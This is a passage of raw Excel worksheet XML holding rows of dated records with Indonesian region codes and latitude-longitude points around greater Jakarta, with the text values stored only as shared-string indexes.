      </c>
      <c r="T3524" t="s">
        <v>42</v>
      </c>
      <c r="U3524" s="5">
        <v>10698913</v>
      </c>
      <c r="V3524" s="5" t="s">
        <v>17626</v>
      </c>
      <c r="W3524" s="5">
        <v>-631709</v>
      </c>
      <c r="X3524" t="s">
        <v>21362</v>
      </c>
      <c r="Y3524" t="str">
        <f t="shared" si="55"/>
        <v>-6.31709,106.98913</v>
      </c>
    </row>
    <row r="3525" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3525">
        <v>269521</v>
      </c>
      <c r="B3525" s="1">
        <v>44247</v>
      </c>
      <c r="C3525" s="2">
        <v>0.98428240740740736</v>
      </c>
      <c r="D3525" t="s">
        <v>22</v>
      </c>
      <c r="E3525" t="s">
        <v>23</v>
      </c>
      <c r="F3525" t="s">
        <v>11677</v>
      </c>
      <c r="H3525" t="s">
        <v>26</v>
      </c>
      <c r="I3525" t="s">
        <v>11678</v>
      </c>
      <c r="J3525" t="s">
        <v>11679</v>
      </c>
      <c r="L3525" t="s">
        <v>11680</v>
      </c>
      <c r="M3525">
        <v>3172030006</v>
      </c>
      <c r="N3525">
        <v>3172030</v>
      </c>
      <c r="O3525">
        <v>3172</v>
      </c>
      <c r="P3525">
        <v>31</v>
      </c>
      <c r="Q3525" t="s">
        <v>462</v>
      </c>
      <c r="R3525" t="s">
        <v>228</v>
      </c>
      <c r="S3525" t="s">
        <v>49</v>
      </c>
      <c r="T3525" t="s">
        <v>33</v>
      </c>
      <c r="U3525" s="5">
        <v>10690004</v>
      </c>
      <c r="V3525" s="5" t="s">
        <v>17627</v>
      </c>
      <c r="W3525" s="5">
        <v>-631936</v>
      </c>
      <c r="X3525" t="s">
        <v>21363</v>
      </c>
      <c r="Y3525" t="str">
        <f t="shared" si="55"/>
        <v>-6.31936,106.90004</v>
      </c>
    </row>
    <row r="3526" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3526">
        <v>269522</v>
      </c>
      <c r="B3526" s="1">
        <v>44247</v>
      </c>
      <c r="C3526" s="2">
        <v>0.98717592592592596</v>
      </c>
      <c r="D3526" t="s">
        <v>22</v>
      </c>
      <c r="E3526" t="s">
        <v>23</v>
      </c>
      <c r="F3526" t="s">
        <v>11681</v>
      </c>
      <c r="G3526" t="s">
        <v>11682</v>
      </c>
      <c r="H3526" t="s">
        <v>26</v>
      </c>
      <c r="I3526" t="s">
        <v>166</v>
      </c>
      <c r="J3526" t="s">
        <v>2627</v>
      </c>
      <c r="L3526" t="s">
        <v>11683</v>
      </c>
      <c r="M3526">
        <v>3275012003</v>
      </c>
      <c r="N3526">
        <v>3275012</v>
      </c>
      <c r="O3526">
        <v>3275</v>
      </c>
      <c r="P3526">
        <v>32</v>
      </c>
      <c r="Q3526" t="s">
        <v>11684</v>
      </c>
      <c r="R3526" t="s">
        <v>4089</v>
      </c>
      <c r="S3526" t="s">
        <v>41</v>
      </c>
      <c r="T3526" t="s">
        <v>42</v>
      </c>
      <c r="U3526" s="5">
        <v>10693462</v>
      </c>
      <c r="V3526" s="5" t="s">
        <v>17628</v>
      </c>
      <c r="W3526" s="5">
        <v>-630806</v>
      </c>
      <c r="X3526" t="s">
        <v>21364</v>
      </c>
      <c r="Y3526" t="str">
        <f t="shared" si="55"/>
        <v>-6.30806,106.93462</v>
      </c>
    </row>
    <row r="3527" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3527">
        <v>269605</v>
      </c>
      <c r="B3527" s="1">
        <v>44247</v>
      </c>
      <c r="C3527" s="2">
        <v>0.99109953703703713</v>
      </c>
      <c r="D3527" t="s">
        <v>22</v>
      </c>
      <c r="E3527" t="s">
        <v>23</v>
      </c>
      <c r="F3527" t="s">
        <v>11685</v>
      </c>
      <c r="G3527" t="s">
        <v>11686</v>
      </c>
      <c r="H3527" t="s">
        <v>26</v>
      </c>
      <c r="I3527" t="s">
        <v>166</v>
      </c>
      <c r="J3527" t="s">
        <v>2627</v>
      </c>
      <c r="L3527" t="s">
        <v>11687</v>
      </c>
      <c r="M3527">
        <v>3275012002</v>
      </c>
      <c r="N3527">
        <v>3275012</v>
      </c>
      <c r="O3527">
        <v>3275</v>
      </c>
      <c r="P3527">
        <v>32</v>
      </c>
      <c r="Q3527" t="s">
        <v>4208</v>
      </c>
      <c r="R3527" t="s">
        <v>4089</v>
      </c>
      <c r="S3527" t="s">
        <v>41</v>
      </c>
      <c r="T3527" t="s">
        <v>42</v>
      </c>
      <c r="U3527" s="5">
        <v>10692288</v>
      </c>
      <c r="V3527" s="5" t="s">
        <v>17629</v>
      </c>
      <c r="W3527" s="5">
        <v>-631421</v>
      </c>
      <c r="X3527" t="s">
        <v>21365</v>
      </c>
      <c r="Y3527" t="str">
        <f t="shared" si="55"/>
        <v>-6.31421,106.92288</v>
      </c>
    </row>
    <row r="3528" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3528">
        <v>269688</v>
      </c>
      <c r="B3528" s="1">
        <v>44248</v>
      </c>
      <c r="C3528" s="2">
        <v>5.9027777777777778E-4</v>
      </c>
      <c r="D3528" t="s">
        <v>22</v>
      </c>
      <c r="E3528" t="s">
        <v>23</v>
      </c>
      <c r="F3528" t="s">
        <v>11688</v>
      </c>
      <c r="G3528" t="s">
        <v>11689</v>
      </c>
      <c r="H3528" t="s">
        <v>26</v>
      </c>
      <c r="I3528" t="s">
        <v>277</v>
      </c>
      <c r="J3528" t="s">
        <v>3135</v>
      </c>
      <c r="L3528" t="s">
        <v>11690</v>
      </c>
      <c r="M3528">
        <v>3603180002</v>
      </c>
      <c r="N3528">
        <v>3603180</v>
      </c>
      <c r="O3528">
        <v>3603</v>
      </c>
      <c r="P3528">
        <v>36</v>
      </c>
      <c r="Q3528" t="s">
        <v>5507</v>
      </c>
      <c r="R3528" t="s">
        <v>5508</v>
      </c>
      <c r="S3528" t="s">
        <v>201</v>
      </c>
      <c r="T3528" t="s">
        <v>171</v>
      </c>
      <c r="U3528" s="5">
        <v>10658603</v>
      </c>
      <c r="V3528" s="5" t="s">
        <v>17630</v>
      </c>
      <c r="W3528" s="5">
        <v>-615775</v>
      </c>
      <c r="X3528" t="s">
        <v>21366</v>
      </c>
      <c r="Y3528" t="str">
        <f t="shared" si="55"/>
        <v>-6.15775,106.58603</v>
      </c>
    </row>
    <row r="3529" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3529">
        <v>269812</v>
      </c>
      <c r="B3529" s="1">
        <v>44248</v>
      </c>
      <c r="C3529" s="2">
        <v>9.1898148148148139E-3</v>
      </c>
      <c r="D3529" t="s">
        <v>22</v>
      </c>
      <c r="E3529" t="s">
        <v>23</v>
      </c>
      <c r="F3529" t="s">
        <v>11691</v>
      </c>
      <c r="H3529" t="s">
        <v>26</v>
      </c>
      <c r="I3529" t="s">
        <v>3095</v>
      </c>
      <c r="J3529" t="s">
        <v>2627</v>
      </c>
      <c r="L3529" t="s">
        <v>11692</v>
      </c>
      <c r="M3529">
        <v>3275050002</v>
      </c>
      <c r="N3529">
        <v>3275050</v>
      </c>
      <c r="O3529">
        <v>3275</v>
      </c>
      <c r="P3529">
        <v>32</v>
      </c>
      <c r="Q3529" t="s">
        <v>2245</v>
      </c>
      <c r="R3529" t="s">
        <v>955</v>
      </c>
      <c r="S3529" t="s">
        <v>41</v>
      </c>
      <c r="T3529" t="s">
        <v>42</v>
      </c>
      <c r="U3529" s="5">
        <v>10697304</v>
      </c>
      <c r="V3529" s="5" t="s">
        <v>17631</v>
      </c>
      <c r="W3529" s="5">
        <v>-625492</v>
      </c>
      <c r="X3529" t="s">
        <v>21367</v>
      </c>
      <c r="Y3529" t="str">
        <f t="shared" si="55"/>
        <v>-6.25492,106.97304</v>
      </c>
    </row>
    <row r="3530" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3530">
        <v>270163</v>
      </c>
      <c r="B3530" s="1">
        <v>44248</v>
      </c>
      <c r="C3530" s="2">
        <v>3.6805555555555557E-2</v>
      </c>
      <c r="D3530" t="s">
        <v>2648</v>
      </c>
      <c r="E3530" t="s">
        <v>23</v>
      </c>
      <c r="G3530" t="s">
        <v>11693</v>
      </c>
      <c r="H3530" t="s">
        <v>26</v>
      </c>
      <c r="I3530" t="s">
        <v>103</v>
      </c>
      <c r="J3530" t="s">
        <v>404</v>
      </c>
      <c r="L3530" t="s">
        <v>11694</v>
      </c>
      <c r="M3530">
        <v>3174020005</v>
      </c>
      <c r="N3530">
        <v>3174020</v>
      </c>
      <c r="O3530">
        <v>3174</v>
      </c>
      <c r="P3530">
        <v>31</v>
      </c>
      <c r="Q3530" t="s">
        <v>30</v>
      </c>
      <c r="R3530" t="s">
        <v>31</v>
      </c>
      <c r="S3530" t="s">
        <v>32</v>
      </c>
      <c r="T3530" t="s">
        <v>33</v>
      </c>
      <c r="U3530" s="5">
        <v>10676922</v>
      </c>
      <c r="V3530" s="5" t="s">
        <v>17561</v>
      </c>
      <c r="W3530" s="5">
        <v>-616619</v>
      </c>
      <c r="X3530" t="s">
        <v>21368</v>
      </c>
      <c r="Y3530" t="str">
        <f t="shared" si="55"/>
        <v>-6.16619,106.76922</v>
      </c>
    </row>
    <row r="3531" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3531">
        <v>270244</v>
      </c>
      <c r="B3531" s="1">
        <v>44248</v>
      </c>
      <c r="C3531" s="2">
        <v>4.3090277777777776E-2</v>
      </c>
      <c r="D3531" t="s">
        <v>22</v>
      </c>
      <c r="E3531" t="s">
        <v>23</v>
      </c>
      <c r="F3531" t="s">
        <v>11695</v>
      </c>
      <c r="H3531" t="s">
        <v>26</v>
      </c>
      <c r="I3531" t="s">
        <v>1046</v>
      </c>
      <c r="J3531" t="s">
        <v>2627</v>
      </c>
      <c r="L3531" t="s">
        <v>11696</v>
      </c>
      <c r="M3531">
        <v>3215031006</v>
      </c>
      <c r="N3531">
        <v>3215031</v>
      </c>
      <c r="O3531">
        <v>3215</v>
      </c>
      <c r="P3531">
        <v>32</v>
      </c>
      <c r="Q3531" t="s">
        <v>11002</v>
      </c>
      <c r="R3531" t="s">
        <v>11003</v>
      </c>
      <c r="S3531" t="s">
        <v>3979</v>
      </c>
      <c r="T3531" t="s">
        <v>42</v>
      </c>
      <c r="U3531" s="5">
        <v>10728739</v>
      </c>
      <c r="V3531" s="5" t="s">
        <v>17632</v>
      </c>
      <c r="W3531" s="5">
        <v>-631820</v>
      </c>
      <c r="X3531" t="s">
        <v>21369</v>
      </c>
      <c r="Y3531" t="str">
        <f t="shared" si="55"/>
        <v>-6.31820,107.28739</v>
      </c>
    </row>
    <row r="3532" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3532">
        <v>270287</v>
      </c>
      <c r="B3532" s="1">
        <v>44248</v>
      </c>
      <c r="C3532" s="2">
        <v>4.6516203703703705E-2</v>
      </c>
      <c r="D3532" t="s">
        <v>22</v>
      </c>
      <c r="E3532" t="s">
        <v>23</v>
      </c>
      <c r="F3532" t="s">
        <v>11697</v>
      </c>
      <c r="H3532" t="s">
        <v>26</v>
      </c>
      <c r="I3532" t="s">
        <v>2165</v>
      </c>
      <c r="J3532" t="s">
        <v>839</v>
      </c>
      <c r="L3532" t="s">
        <v>11698</v>
      </c>
      <c r="M3532">
        <v>3175010002</v>
      </c>
      <c r="N3532">
        <v>3175010</v>
      </c>
      <c r="O3532">
        <v>3175</v>
      </c>
      <c r="P3532">
        <v>31</v>
      </c>
      <c r="Q3532" t="s">
        <v>616</v>
      </c>
      <c r="R3532" t="s">
        <v>546</v>
      </c>
      <c r="S3532" t="s">
        <v>547</v>
      </c>
      <c r="T3532" t="s">
        <v>33</v>
      </c>
      <c r="U3532" s="5">
        <v>10676378</v>
      </c>
      <c r="V3532" s="5" t="s">
        <v>17633</v>
      </c>
      <c r="W3532" s="5">
        <v>-613590</v>
      </c>
      <c r="X3532" t="s">
        <v>21370</v>
      </c>
      <c r="Y3532" t="str">
        <f t="shared" si="55"/>
        <v>-6.13590,106.76378</v>
      </c>
    </row>
    <row r="3533" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3533">
        <v>270288</v>
      </c>
      <c r="B3533" s="1">
        <v>44248</v>
      </c>
      <c r="C3533" s="2">
        <v>4.8645833333333333E-2</v>
      </c>
      <c r="D3533" t="s">
        <v>22</v>
      </c>
      <c r="E3533" t="s">
        <v>23</v>
      </c>
      <c r="F3533" t="s">
        <v>11699</v>
      </c>
      <c r="G3533" t="s">
        <v>11700</v>
      </c>
      <c r="H3533" t="s">
        <v>26</v>
      </c>
      <c r="I3533" t="s">
        <v>383</v>
      </c>
      <c r="J3533" t="s">
        <v>2627</v>
      </c>
      <c r="L3533" t="s">
        <v>11701</v>
      </c>
      <c r="M3533">
        <v>3216082003</v>
      </c>
      <c r="N3533">
        <v>3216082</v>
      </c>
      <c r="O3533">
        <v>3216</v>
      </c>
      <c r="P3533">
        <v>32</v>
      </c>
      <c r="Q3533" t="s">
        <v>11702</v>
      </c>
      <c r="R3533" t="s">
        <v>601</v>
      </c>
      <c r="S3533" t="s">
        <v>41</v>
      </c>
      <c r="T3533" t="s">
        <v>42</v>
      </c>
      <c r="U3533" s="5">
        <v>10706359</v>
      </c>
      <c r="V3533" s="5" t="s">
        <v>17634</v>
      </c>
      <c r="W3533" s="5">
        <v>-622033</v>
      </c>
      <c r="X3533" t="s">
        <v>21371</v>
      </c>
      <c r="Y3533" t="str">
        <f t="shared" si="55"/>
        <v>-6.22033,107.06359</v>
      </c>
    </row>
    <row r="3534" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3534">
        <v>270374</v>
      </c>
      <c r="B3534" s="1">
        <v>44248</v>
      </c>
      <c r="C3534" s="2">
        <v>5.5219907407407405E-2</v>
      </c>
      <c r="D3534" t="s">
        <v>22</v>
      </c>
      <c r="E3534" t="s">
        <v>23</v>
      </c>
      <c r="F3534" t="s">
        <v>11703</v>
      </c>
      <c r="H3534" t="s">
        <v>26</v>
      </c>
      <c r="I3534" t="s">
        <v>1633</v>
      </c>
      <c r="J3534" t="s">
        <v>644</v>
      </c>
      <c r="L3534" t="s">
        <v>11704</v>
      </c>
      <c r="M3534">
        <v>3174070002</v>
      </c>
      <c r="N3534">
        <v>3174070</v>
      </c>
      <c r="O3534">
        <v>3174</v>
      </c>
      <c r="P3534">
        <v>31</v>
      </c>
      <c r="Q3534" t="s">
        <v>621</v>
      </c>
      <c r="R3534" t="s">
        <v>84</v>
      </c>
      <c r="S3534" t="s">
        <v>32</v>
      </c>
      <c r="T3534" t="s">
        <v>33</v>
      </c>
      <c r="U3534" s="5">
        <v>10674485</v>
      </c>
      <c r="V3534" s="5" t="s">
        <v>17635</v>
      </c>
      <c r="W3534" s="5">
        <v>-616065</v>
      </c>
      <c r="X3534" t="s">
        <v>21372</v>
      </c>
      <c r="Y3534" t="str">
        <f t="shared" si="55"/>
        <v>-6.16065,106.74485</v>
      </c>
    </row>
    <row r="3535" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3535">
        <v>270375</v>
      </c>
      <c r="B3535" s="1">
        <v>44248</v>
      </c>
      <c r="C3535" s="2">
        <v>5.6238425925925928E-2</v>
      </c>
      <c r="D3535" t="s">
        <v>22</v>
      </c>
      <c r="E3535" t="s">
        <v>23</v>
      </c>
      <c r="F3535" t="s">
        <v>11705</v>
      </c>
      <c r="H3535" t="s">
        <v>26</v>
      </c>
      <c r="I3535" t="s">
        <v>1633</v>
      </c>
      <c r="J3535" t="s">
        <v>723</v>
      </c>
      <c r="L3535" t="s">
        <v>10325</v>
      </c>
      <c r="M3535">
        <v>3174070002</v>
      </c>
      <c r="N3535">
        <v>3174070</v>
      </c>
      <c r="O3535">
        <v>3174</v>
      </c>
      <c r="P3535">
        <v>31</v>
      </c>
      <c r="Q3535" t="s">
        <v>621</v>
      </c>
      <c r="R3535" t="s">
        <v>84</v>
      </c>
      <c r="S3535" t="s">
        <v>32</v>
      </c>
      <c r="T3535" t="s">
        <v>33</v>
      </c>
      <c r="U3535" s="5">
        <v>10674470</v>
      </c>
      <c r="V3535" s="5" t="s">
        <v>17636</v>
      </c>
      <c r="W3535" s="5">
        <v>-616526</v>
      </c>
      <c r="X3535" t="s">
        <v>21373</v>
      </c>
      <c r="Y3535" t="str">
        <f t="shared" si="55"/>
        <v>-6.16526,106.74470</v>
      </c>
    </row>
    <row r="3536" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3536">
        <v>270379</v>
      </c>
      <c r="B3536" s="1">
        <v>44248</v>
      </c>
      <c r="C3536" s="2">
        <v>5.4166666666666669E-2</v>
      </c>
      <c r="D3536" t="s">
        <v>2648</v>
      </c>
      <c r="E3536" t="s">
        <v>23</v>
      </c>
      <c r="G3536" t="s">
        <v>11706</v>
      </c>
      <c r="H3536" t="s">
        <v>26</v>
      </c>
      <c r="J3536" t="s">
        <v>2627</v>
      </c>
      <c r="L3536" t="s">
        <v>11707</v>
      </c>
      <c r="M3536">
        <v>3216081010</v>
      </c>
      <c r="N3536">
        <v>3216081</v>
      </c>
      <c r="O3536">
        <v>3216</v>
      </c>
      <c r="P3536">
        <v>32</v>
      </c>
      <c r="Q3536" t="s">
        <v>6132</v>
      </c>
      <c r="R3536" t="s">
        <v>2512</v>
      </c>
      <c r="S3536" t="s">
        <v>41</v>
      </c>
      <c r="T3536" t="s">
        <v>42</v>
      </c>
      <c r="U3536" s="5">
        <v>10707833</v>
      </c>
      <c r="V3536" s="5" t="s">
        <v>17637</v>
      </c>
      <c r="W3536" s="5">
        <v>-620264</v>
      </c>
      <c r="X3536" t="s">
        <v>21374</v>
      </c>
      <c r="Y3536" t="str">
        <f t="shared" si="55"/>
        <v>-6.20264,107.07833</v>
      </c>
    </row>
    <row r="3537" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3537">
        <v>270419</v>
      </c>
      <c r="B3537" s="1">
        <v>44248</v>
      </c>
      <c r="C3537" s="2">
        <v>5.7384259259259253E-2</v>
      </c>
      <c r="D3537" t="s">
        <v>22</v>
      </c>
      <c r="E3537" t="s">
        <v>23</v>
      </c>
      <c r="F3537" t="s">
        <v>11708</v>
      </c>
      <c r="H3537" t="s">
        <v>26</v>
      </c>
      <c r="I3537" t="s">
        <v>27</v>
      </c>
      <c r="J3537" t="s">
        <v>875</v>
      </c>
      <c r="L3537" t="s">
        <v>11709</v>
      </c>
      <c r="M3537">
        <v>3174070002</v>
      </c>
      <c r="N3537">
        <v>3174070</v>
      </c>
      <c r="O3537">
        <v>3174</v>
      </c>
      <c r="P3537">
        <v>31</v>
      </c>
      <c r="Q3537" t="s">
        <v>621</v>
      </c>
      <c r="R3537" t="s">
        <v>84</v>
      </c>
      <c r="S3537" t="s">
        <v>32</v>
      </c>
      <c r="T3537" t="s">
        <v>33</v>
      </c>
      <c r="U3537" s="5">
        <v>10673396</v>
      </c>
      <c r="V3537" s="5" t="s">
        <v>17638</v>
      </c>
      <c r="W3537" s="5">
        <v>-616998</v>
      </c>
      <c r="X3537" t="s">
        <v>18758</v>
      </c>
      <c r="Y3537" t="str">
        <f t="shared" si="55"/>
        <v>-6.16998,106.73396</v>
      </c>
    </row>
    <row r="3538" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3538">
        <v>270420</v>
      </c>
      <c r="B3538" s="1">
        <v>44248</v>
      </c>
      <c r="C3538" s="2">
        <v>5.8634259259259254E-2</v>
      </c>
      <c r="D3538" t="s">
        <v>22</v>
      </c>
      <c r="E3538" t="s">
        <v>23</v>
      </c>
      <c r="F3538" t="s">
        <v>11710</v>
      </c>
      <c r="H3538" t="s">
        <v>26</v>
      </c>
      <c r="I3538" t="s">
        <v>27</v>
      </c>
      <c r="J3538" t="s">
        <v>875</v>
      </c>
      <c r="L3538" t="s">
        <v>11711</v>
      </c>
      <c r="M3538">
        <v>3174070002</v>
      </c>
      <c r="N3538">
        <v>3174070</v>
      </c>
      <c r="O3538">
        <v>3174</v>
      </c>
      <c r="P3538">
        <v>31</v>
      </c>
      <c r="Q3538" t="s">
        <v>621</v>
      </c>
      <c r="R3538" t="s">
        <v>84</v>
      </c>
      <c r="S3538" t="s">
        <v>32</v>
      </c>
      <c r="T3538" t="s">
        <v>33</v>
      </c>
      <c r="U3538" s="5">
        <v>10673352</v>
      </c>
      <c r="V3538" s="5" t="s">
        <v>17639</v>
      </c>
      <c r="W3538" s="5">
        <v>-616321</v>
      </c>
      <c r="X3538" t="s">
        <v>19592</v>
      </c>
      <c r="Y3538" t="str">
        <f t="shared" si="55"/>
        <v>-6.16321,106.73352</v>
      </c>
    </row>
    <row r="3539" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3539">
        <v>270421</v>
      </c>
      <c r="B3539" s="1">
        <v>44248</v>
      </c>
      <c r="C3539" s="2">
        <v>5.9212962962962967E-2</v>
      </c>
      <c r="D3539" t="s">
        <v>22</v>
      </c>
      <c r="E3539" t="s">
        <v>23</v>
      </c>
      <c r="F3539" t="s">
        <v>11712</v>
      </c>
      <c r="G3539" t="s">
        <v>11713</v>
      </c>
      <c r="H3539" t="s">
        <v>26</v>
      </c>
      <c r="I3539" t="s">
        <v>65</v>
      </c>
      <c r="J3539" t="s">
        <v>675</v>
      </c>
      <c r="L3539" t="s">
        <v>11714</v>
      </c>
      <c r="M3539">
        <v>3174010006</v>
      </c>
      <c r="N3539">
        <v>3174010</v>
      </c>
      <c r="O3539">
        <v>3174</v>
      </c>
      <c r="P3539">
        <v>31</v>
      </c>
      <c r="Q3539" t="s">
        <v>268</v>
      </c>
      <c r="R3539" t="s">
        <v>69</v>
      </c>
      <c r="S3539" t="s">
        <v>32</v>
      </c>
      <c r="T3539" t="s">
        <v>33</v>
      </c>
      <c r="U3539" s="5">
        <v>10673386</v>
      </c>
      <c r="V3539" s="5" t="s">
        <v>17640</v>
      </c>
      <c r="W3539" s="5">
        <v>-617529</v>
      </c>
      <c r="X3539" t="s">
        <v>21375</v>
      </c>
      <c r="Y3539" t="str">
        <f t="shared" si="55"/>
        <v>-6.17529,106.73386</v>
      </c>
    </row>
    <row r="3540" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3540">
        <v>270465</v>
      </c>
      <c r="B3540" s="1">
        <v>44248</v>
      </c>
      <c r="C3540" s="2">
        <v>6.25E-2</v>
      </c>
      <c r="D3540" t="s">
        <v>22</v>
      </c>
      <c r="E3540" t="s">
        <v>23</v>
      </c>
      <c r="F3540" t="s">
        <v>11715</v>
      </c>
      <c r="H3540" t="s">
        <v>26</v>
      </c>
      <c r="I3540" t="s">
        <v>1194</v>
      </c>
      <c r="J3540" t="s">
        <v>11716</v>
      </c>
      <c r="L3540" t="s">
        <v>11717</v>
      </c>
      <c r="M3540">
        <v>3174070002</v>
      </c>
      <c r="N3540">
        <v>3174070</v>
      </c>
      <c r="O3540">
        <v>3174</v>
      </c>
      <c r="P3540">
        <v>31</v>
      </c>
      <c r="Q3540" t="s">
        <v>621</v>
      </c>
      <c r="R3540" t="s">
        <v>84</v>
      </c>
      <c r="S3540" t="s">
        <v>32</v>
      </c>
      <c r="T3540" t="s">
        <v>33</v>
      </c>
      <c r="U3540" s="5">
        <v>10673499</v>
      </c>
      <c r="V3540" s="5" t="s">
        <v>17641</v>
      </c>
      <c r="W3540" s="5">
        <v>-616155</v>
      </c>
      <c r="X3540" t="s">
        <v>21376</v>
      </c>
      <c r="Y3540" t="str">
        <f t="shared" si="55"/>
        <v>-6.16155,106.73499</v>
      </c>
    </row>
    <row r="3541" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3541">
        <v>270681</v>
      </c>
      <c r="B3541" s="1">
        <v>44248</v>
      </c>
      <c r="C3541" s="2">
        <v>7.8182870370370375E-2</v>
      </c>
      <c r="D3541" t="s">
        <v>22</v>
      </c>
      <c r="E3541" t="s">
        <v>23</v>
      </c>
      <c r="F3541" t="s">
        <v>11718</v>
      </c>
      <c r="G3541" t="s">
        <v>11719</v>
      </c>
      <c r="H3541" t="s">
        <v>26</v>
      </c>
      <c r="I3541" t="s">
        <v>3668</v>
      </c>
      <c r="J3541" t="s">
        <v>875</v>
      </c>
      <c r="L3541" t="s">
        <v>11720</v>
      </c>
      <c r="M3541">
        <v>3174070002</v>
      </c>
      <c r="N3541">
        <v>3174070</v>
      </c>
      <c r="O3541">
        <v>3174</v>
      </c>
      <c r="P3541">
        <v>31</v>
      </c>
      <c r="Q3541" t="s">
        <v>621</v>
      </c>
      <c r="R3541" t="s">
        <v>84</v>
      </c>
      <c r="S3541" t="s">
        <v>32</v>
      </c>
      <c r="T3541" t="s">
        <v>33</v>
      </c>
      <c r="U3541" s="5">
        <v>10674266</v>
      </c>
      <c r="V3541" s="5" t="s">
        <v>17642</v>
      </c>
      <c r="W3541" s="5">
        <v>-616630</v>
      </c>
      <c r="X3541" t="s">
        <v>19827</v>
      </c>
      <c r="Y3541" t="str">
        <f t="shared" si="55"/>
        <v>-6.16630,106.74266</v>
      </c>
    </row>
    <row r="3542" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3542">
        <v>270725</v>
      </c>
      <c r="B3542" s="1">
        <v>44248</v>
      </c>
      <c r="C3542" s="2">
        <v>8.184027777777779E-2</v>
      </c>
      <c r="D3542" t="s">
        <v>22</v>
      </c>
      <c r="E3542" t="s">
        <v>23</v>
      </c>
      <c r="F3542" s="3" t="s">
        <v>11721</v>
      </c>
      <c r="G3542" t="s">
        <v>11722</v>
      </c>
      <c r="H3542" t="s">
        <v>26</v>
      </c>
      <c r="I3542" t="s">
        <v>443</v>
      </c>
      <c r="J3542" t="s">
        <v>2627</v>
      </c>
      <c r="L3542" t="s">
        <v>11723</v>
      </c>
      <c r="M3542">
        <v>3216022006</v>
      </c>
      <c r="N3542">
        <v>3216022</v>
      </c>
      <c r="O3542">
        <v>3216</v>
      </c>
      <c r="P3542">
        <v>32</v>
      </c>
      <c r="Q3542" t="s">
        <v>11209</v>
      </c>
      <c r="R3542" t="s">
        <v>9842</v>
      </c>
      <c r="S3542" t="s">
        <v>41</v>
      </c>
      <c r="T3542" t="s">
        <v>42</v>
      </c>
      <c r="U3542" s="5">
        <v>10716414</v>
      </c>
      <c r="V3542" s="5" t="s">
        <v>17643</v>
      </c>
      <c r="W3542" s="5">
        <v>-631091</v>
      </c>
      <c r="X3542" t="s">
        <v>21377</v>
      </c>
      <c r="Y3542" t="str">
        <f t="shared" si="55"/>
        <v>-6.31091,107.16414</v>
      </c>
    </row>
    <row r="3543" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3543">
        <v>271070</v>
      </c>
      <c r="B3543" s="1">
        <v>44248</v>
      </c>
      <c r="C3543" s="2">
        <v>0.11084490740740742</v>
      </c>
      <c r="D3543" t="s">
        <v>22</v>
      </c>
      <c r="E3543" t="s">
        <v>23</v>
      </c>
      <c r="F3543" t="s">
        <v>11724</v>
      </c>
      <c r="H3543" t="s">
        <v>26</v>
      </c>
      <c r="I3543" t="s">
        <v>974</v>
      </c>
      <c r="J3543" t="s">
        <v>2627</v>
      </c>
      <c r="L3543" t="s">
        <v>11725</v>
      </c>
      <c r="M3543">
        <v>3276030011</v>
      </c>
      <c r="N3543">
        <v>3276030</v>
      </c>
      <c r="O3543">
        <v>3276</v>
      </c>
      <c r="P3543">
        <v>32</v>
      </c>
      <c r="Q3543" t="s">
        <v>10939</v>
      </c>
      <c r="R3543" t="s">
        <v>184</v>
      </c>
      <c r="S3543" t="s">
        <v>185</v>
      </c>
      <c r="T3543" t="s">
        <v>42</v>
      </c>
      <c r="U3543" s="5">
        <v>10685858</v>
      </c>
      <c r="V3543" s="5" t="s">
        <v>17644</v>
      </c>
      <c r="W3543" s="5">
        <v>-637274</v>
      </c>
      <c r="X3543" t="s">
        <v>21378</v>
      </c>
      <c r="Y3543" t="str">
        <f t="shared" si="55"/>
        <v>-6.37274,106.85858</v>
      </c>
    </row>
    <row r="3544" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3544">
        <v>271114</v>
      </c>
      <c r="B3544" s="1">
        <v>44248</v>
      </c>
      <c r="C3544" s="2">
        <v>0.11318287037037038</v>
      </c>
      <c r="D3544" t="s">
        <v>22</v>
      </c>
      <c r="E3544" t="s">
        <v>23</v>
      </c>
      <c r="F3544" t="s">
        <v>11726</v>
      </c>
      <c r="H3544" t="s">
        <v>26</v>
      </c>
      <c r="I3544" t="s">
        <v>7646</v>
      </c>
      <c r="J3544" t="s">
        <v>1656</v>
      </c>
      <c r="L3544" t="s">
        <v>250</v>
      </c>
      <c r="M3544">
        <v>3173080003</v>
      </c>
      <c r="N3544">
        <v>3173080</v>
      </c>
      <c r="O3544">
        <v>3173</v>
      </c>
      <c r="P3544">
        <v>31</v>
      </c>
      <c r="Q3544" t="s">
        <v>157</v>
      </c>
      <c r="R3544" t="s">
        <v>157</v>
      </c>
      <c r="S3544" t="s">
        <v>62</v>
      </c>
      <c r="T3544" t="s">
        <v>33</v>
      </c>
      <c r="U3544" s="5">
        <v>10682719</v>
      </c>
      <c r="V3544" s="5" t="s">
        <v>16695</v>
      </c>
      <c r="W3544" s="5">
        <v>-617543</v>
      </c>
      <c r="X3544" t="s">
        <v>21379</v>
      </c>
      <c r="Y3544" t="str">
        <f t="shared" si="55"/>
        <v>-6.17543,106.82719</v>
      </c>
    </row>
    <row r="3545" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3545">
        <v>271287</v>
      </c>
      <c r="B3545" s="1">
        <v>44248</v>
      </c>
      <c r="C3545" s="2">
        <v>0.12755787037037036</v>
      </c>
      <c r="D3545" t="s">
        <v>22</v>
      </c>
      <c r="E3545" t="s">
        <v>23</v>
      </c>
      <c r="F3545" t="s">
        <v>11727</v>
      </c>
      <c r="G3545" t="s">
        <v>11728</v>
      </c>
      <c r="H3545" t="s">
        <v>26</v>
      </c>
